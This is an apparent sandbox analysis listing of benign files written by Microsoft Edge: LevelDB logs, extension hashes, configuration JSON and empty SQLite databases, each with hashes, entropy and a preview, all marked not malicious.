                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):334
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.214049345855342
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RMU+q2PcNwi23oH+Tcwt865IFUt8O8RM0Zmw+O8RMUVkwOcNwi23oH+Tcwt86L:7NpvLZYeb/WFUt8ON0/+ON054ZYeb/+e
                                                                                                                                                                                                                                                                                          MD5:AC69E6B3BEE3722ACCF3940869A5363F
                                                                                                                                                                                                                                                                                          SHA1:76924A4ECC0BACA35E8D884F4F1774E445DBD3CA
                                                                                                                                                                                                                                                                                          SHA-256:245C4ED0ACCF63468CC406B0BCF55E946D2E8FA2B2B08FAEED1167BE485AC067
                                                                                                                                                                                                                                                                                          SHA-512:E8E4614F95D87AEAEE76270CBCBD56DC9F28783E8DB1D462A6D70BC321A6AFB5D36ACCB572213942467FD003161B80712DC6F677545BFA215A081EF644AADC24
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.803 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/19-03:45:52.803 19e8 Recovering log #3.2024/12/19-03:45:52.803 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):334
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.214049345855342
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RMU+q2PcNwi23oH+Tcwt865IFUt8O8RM0Zmw+O8RMUVkwOcNwi23oH+Tcwt86L:7NpvLZYeb/WFUt8ON0/+ON054ZYeb/+e
                                                                                                                                                                                                                                                                                          MD5:AC69E6B3BEE3722ACCF3940869A5363F
                                                                                                                                                                                                                                                                                          SHA1:76924A4ECC0BACA35E8D884F4F1774E445DBD3CA
                                                                                                                                                                                                                                                                                          SHA-256:245C4ED0ACCF63468CC406B0BCF55E946D2E8FA2B2B08FAEED1167BE485AC067
                                                                                                                                                                                                                                                                                          SHA-512:E8E4614F95D87AEAEE76270CBCBD56DC9F28783E8DB1D462A6D70BC321A6AFB5D36ACCB572213942467FD003161B80712DC6F677545BFA215A081EF644AADC24
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.803 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/19-03:45:52.803 19e8 Recovering log #3.2024/12/19-03:45:52.803 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1254
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                          MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                          SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                          SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                          SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1954682176217455
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RoGU+q2PcNwi23oH+Tcwt8NIFUt8O8RoMLZmw+O8RoMbVkwOcNwi23oH+Tcwt2:7p4vLZYebpFUt8OpO/+Opi54ZYebqJ
                                                                                                                                                                                                                                                                                          MD5:8F5C8E16A32DA4C69800574A7759EAA4
                                                                                                                                                                                                                                                                                          SHA1:21FEF87145D34D8C640FB616DFB0404C06324F87
                                                                                                                                                                                                                                                                                          SHA-256:B5CD00266DEB34C6BDEC7D7929CE851630EB78F5F9F801AF27FFC31A7F059DCA
                                                                                                                                                                                                                                                                                          SHA-512:CD58388D27F942DF415295ED3EE37A813BAAB0383B9F1B04C0E0D83DE195B26ABEA4030760B00FCB0C3BAC3B2687BD453D3DD81181DE4997B5B46C923D70F09C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.522 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/19-03:45:53.523 19e8 Recovering log #3.2024/12/19-03:45:53.523 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1954682176217455
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RoGU+q2PcNwi23oH+Tcwt8NIFUt8O8RoMLZmw+O8RoMbVkwOcNwi23oH+Tcwt2:7p4vLZYebpFUt8OpO/+Opi54ZYebqJ
                                                                                                                                                                                                                                                                                          MD5:8F5C8E16A32DA4C69800574A7759EAA4
                                                                                                                                                                                                                                                                                          SHA1:21FEF87145D34D8C640FB616DFB0404C06324F87
                                                                                                                                                                                                                                                                                          SHA-256:B5CD00266DEB34C6BDEC7D7929CE851630EB78F5F9F801AF27FFC31A7F059DCA
                                                                                                                                                                                                                                                                                          SHA-512:CD58388D27F942DF415295ED3EE37A813BAAB0383B9F1B04C0E0D83DE195B26ABEA4030760B00FCB0C3BAC3B2687BD453D3DD81181DE4997B5B46C923D70F09C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.522 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/19-03:45:53.523 19e8 Recovering log #3.2024/12/19-03:45:53.523 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):429
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                          MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                          SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                          SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                          SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8720
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.21917635620654863
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:5ZtFlljq7A/mhWJFuQ3yy7IOWURudweytllrE9SFcTp4AGbNCV9RUI+:M75fOid0Xi99pEYE
                                                                                                                                                                                                                                                                                          MD5:57CE59652CA7F2442178A7E9325C4749
                                                                                                                                                                                                                                                                                          SHA1:68D66F301C777D86EC1E0EDF343AC607C4DE9992
                                                                                                                                                                                                                                                                                          SHA-256:DC6E30678357424F99C655C1AE83D39C6051B35CAE253F7384B66430D2008B96
                                                                                                                                                                                                                                                                                          SHA-512:39541A3CACAD4FCF5950CD06D2341D80A8AE76F26791FD405B2E936AB495892938F8A8553E2DA854E497779070B3F5E63AE0B6EC27DF41442B9252863045CA69
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:............`8.....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6476102401264106
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:aj9P0Pgam6IZP/KbtQQkQerV773pLgjl7hlcERKToaAu:adJpP/le2V7kl7AERKcC
                                                                                                                                                                                                                                                                                          MD5:2C921CA2D9C1449A1900658C31FABB51
                                                                                                                                                                                                                                                                                          SHA1:979C8326A8E02ABA2E417BD1271F591BFCAF1BC9
                                                                                                                                                                                                                                                                                          SHA-256:5970D62F7D798B829BFBD05C25D82DBF3E1AD27AD7CDDB574A64CACCEBAE1242
                                                                                                                                                                                                                                                                                          SHA-512:8ED4F16F236024CD6AD78FBBEB571AB119F036C7FD1023FBBEA6AA6335D1CE245508D6E49EBB91F4A20B3F84D20DFF6FF01C2A69DA4454CAD4DA5E82B7BC1BB1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):411
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.324256432826978
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:7HeVvLZYeb8rcHEZrELFUt8OHeG1/+OHeI54ZYeb8rcHEZrEZSJ:7+5lYeb8nZrExg8O+w+SoYeb8nZrEZe
                                                                                                                                                                                                                                                                                          MD5:9192CEA5ACCF35A78CB7336E53CB1493
                                                                                                                                                                                                                                                                                          SHA1:66FE93091BDCDA5F9516F1BD4E9EC6CE307A569F
                                                                                                                                                                                                                                                                                          SHA-256:F77BC21531C16FF55652742291618EC990A0F488B84AD6C0908BDDF40DA2DD10
                                                                                                                                                                                                                                                                                          SHA-512:466EC6FECB6EA4A9C1F6A60877D67B594296D111C45437DB5300DA76B2F783CBCC9DE253CBBA2A26AB13C57AE36C1DEF948A47E88F840729AAFB95FA7FC05ED4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:56.581 838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/19-03:45:56.581 838 Recovering log #3.2024/12/19-03:45:56.581 838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.654725900836922
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:o+ZrE0d2KN+9XZdDV03Sx4hryIH7AHHk2GJ348ylsT:o+2WA5LbhdP8osT
                                                                                                                                                                                                                                                                                          MD5:25FD2E00FD25D876D34227F6EE966A0B
                                                                                                                                                                                                                                                                                          SHA1:EB8135C57045133E3A7642101F003013FE61A90C
                                                                                                                                                                                                                                                                                          SHA-256:E9A5A88B2798CE2E279CDBCCC09EEE9702BF8EB598CE59CD08B00767BBBF6C10
                                                                                                                                                                                                                                                                                          SHA-512:61248E3745D1A124FDFAA22B5F2C2F348A9D9EEB6973B2A6150C6431E4FF325AD06BD9986BFC650B040FB589E62E04DB34843F0A588B126BA12418BDCEA3F217
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:....z................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":781}.!_https://ntp.msn.com..LastKnownPV..1734597969733.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734597970855.._https://ntp.msn.com..MUID!.08F1B41B03E76B2C0A73A14102FE6A7B.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734597969800,"schedule":[-1,9,24,-1,-1,-1,25],"scheduleFixed":[-1,9,24,-1,-1,-1,25],"simpleSchedule":[44,13,51,23,20,10,50]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734597969705.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241218.370"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):339
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.251865036550899
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Roq+q2PcNwi23oH+Tcwt8a2jMGIFUt8O8RogSZmw+O8RoeVkwOcNwi23oH+TcL:7pLvLZYeb8EFUt8OpgS/+Opu54ZYeb8N
                                                                                                                                                                                                                                                                                          MD5:CC9EBF68055F151DA9FA5EBA8BA4D5DD
                                                                                                                                                                                                                                                                                          SHA1:CB5584B3650602B11E9CB7FC49A2E5F3DC9551DF
                                                                                                                                                                                                                                                                                          SHA-256:49C3AA4E20798404D8B59762E2FF7C95AA938BC39886ED0BA6FC10B347D82746
                                                                                                                                                                                                                                                                                          SHA-512:5CCEB1037084BBF0A06751C419CFA60276B7B961BDE894C27FF3088A3818A885C451A2D645902EB47EE544B229CF22899EC24DB59700058C4E394169C9298AB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.116 788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/19-03:45:53.117 788 Recovering log #3.2024/12/19-03:45:53.145 788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):339
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.251865036550899
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Roq+q2PcNwi23oH+Tcwt8a2jMGIFUt8O8RogSZmw+O8RoeVkwOcNwi23oH+TcL:7pLvLZYeb8EFUt8OpgS/+Opu54ZYeb8N
                                                                                                                                                                                                                                                                                          MD5:CC9EBF68055F151DA9FA5EBA8BA4D5DD
                                                                                                                                                                                                                                                                                          SHA1:CB5584B3650602B11E9CB7FC49A2E5F3DC9551DF
                                                                                                                                                                                                                                                                                          SHA-256:49C3AA4E20798404D8B59762E2FF7C95AA938BC39886ED0BA6FC10B347D82746
                                                                                                                                                                                                                                                                                          SHA-512:5CCEB1037084BBF0A06751C419CFA60276B7B961BDE894C27FF3088A3818A885C451A2D645902EB47EE544B229CF22899EC24DB59700058C4E394169C9298AB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.116 788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/19-03:45:53.117 788 Recovering log #3.2024/12/19-03:45:53.145 788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1618
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                                          MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                                          SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                                          SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                                          SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7719300861292164
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:tTto9zEPUUS8TVZZeERIAuhmsAp1dpDXcf0L/ZJVb:VtpUronZeuIAamsATDXI0LhJVb
                                                                                                                                                                                                                                                                                          MD5:DC890A3082A083BB8469F6B330258B22
                                                                                                                                                                                                                                                                                          SHA1:75EC75C7DE3BDEB8793913344F22EC0B2EEF9F39
                                                                                                                                                                                                                                                                                          SHA-256:083F5B13CA3CA92CD62CC2BE8E100AB112C38DA341A1B50F72AEB80565E2FBA6
                                                                                                                                                                                                                                                                                          SHA-512:518429FEE458094E6AF55493CED5EC9A99859A8C48D0880CEBC1E99AFCE90E0BC1E1952CD5B003CA333907EF3F5B94754C1CF513A983E33632FDFEBEAB4DDCC1
                                                                                                                                                                                                                                                                                          Malicious:false
Preview:SQLite format 3 (binary header, non-printable bytes omitted)
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.3768206827965745
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSNWd:JkIEumQv8m1ccnvS4ALDHlGFh57QBw1a
                                                                                                                                                                                                                                                                                          MD5:B117340B26A5B669E1D319D60BB214E3
                                                                                                                                                                                                                                                                                          SHA1:29730BD0136E0F90163DD30E94868772EF7BAC25
                                                                                                                                                                                                                                                                                          SHA-256:462C13F9140F96DC1C864AFC33ABDC28A9A9444631032A6EF41FB8E7264FD860
                                                                                                                                                                                                                                                                                          SHA-512:8A4B743A052A3853863D535F510E476EE2815DD6D533F8E8A74B5C517BE5148A36AEE9D5EA27103123C24E64B4CFD543D0383A12811F585F62CB54D3214F3754
                                                                                                                                                                                                                                                                                          Malicious:false
Preview:SQLite format 3......@ ...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
